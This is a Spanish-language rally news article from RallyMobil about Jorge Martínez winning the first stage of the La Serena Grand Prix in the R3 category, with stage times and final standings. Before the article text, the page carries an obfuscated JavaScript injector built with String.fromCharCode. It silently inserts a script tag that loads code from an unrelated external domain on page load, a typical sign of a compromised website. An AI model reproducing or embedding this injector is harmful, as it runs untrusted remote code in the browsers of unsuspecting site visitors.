Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,102,111,114,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); Jorge Martínez se toma revancha en La Serena | RallyMobil

Jorge Martínez se toma revancha en La Serena

JORGE_MARTINEZ_F_190714_06

El piloto del equipo Cirkus ganó cuatro especiales de un total de seis pruebas establecidas para la primera etapa de competencia. Con esta resultado el piloto oficial Renault Sport vuelve a estar en la disputa por el título de la categoría mundial R3.

El primer día de competencia del Gran Premio de La Serena tendría un gran ganador en la categoría mundial R3. El binomio de Jorge Martínez y Alberto Álvarez conseguían desde el inicio quedarse con la prueba especial uno entre Andacollo y Cuesta Piedra.  Un recorrido de 7.8 kilómetros en el que el seis veces campeón de Chile lograba una diferencia de 8 segundos de Ramón Ibarra, quien conseguía el segundo lugar parcial, y a 10 de Cristóbal Vidaurre, quien a pesar de salir con atraso del Parque de Asistencia por problemas mecánicos, lograba estar en los tiempos de punta y cerrar el primer tramo del día en el tercer lugar.

En adelante la historia no sería del todo diferente. El piloto penquista se quedaba con el segundo tramo del día y con el mejor tiempo de todos los participantes,  superando incluso a Emilio Rosselot –de la categoría N4– por 4 segundos de diferencia. De cerca, continuaba el binomio de Tomás Etcheverry y Ricardo Rojas, quienes quedaban a esa altura a 22 segundos de diferencia con el puntero. Terceros se ubicaba el binomio de Ramón Ibarra y Rubén García.

En adelante la historia cambiaría radicalmente para el piloto del Entel Sony Xperia, Tomás Etcheverry, quien sufría problemas mecánicos debido a que la abrazadera que sostenía la manguera del turbo no resistió la dureza de los caminos, soltándose y haciendo perder potencia a los vehículos. Poco a poco vio como el piloto oficial Renault Sport, Jorge Martínez, se alejaba cada vez más al andar de la competencia.

Al cierre de la jornada, era Ingo Hofmann quien se quedaba con la última especial del día, le seguía Jorge Martínez y Ramón Ibarra. Con este resultado Martínez lograba un tiempo de 1:04’46’’6 para la primera etapa, una diferencia de 1 minuto y 35 segundos del mismo Ibarra, quien terminó en la segunda ubicación de la etapa sabatina.

“Estamos muy contentos con este triunfo porque nos ayuda a volver a estar en la punta de la categoría. Mañana saldremos a cuidar la diferencia que tenemos para no cometer un error que nos deje fuera de competencia”, explicó Jorge Martínez.

Categoría R3
1° Jorge Martínez (Renault Clio) 1h.04’46”6
2° Ramón Ibarra (Renault Clio) 1h.06’21”3
3° Ingo Hofmann (Renault Clio) 1h.06’31”6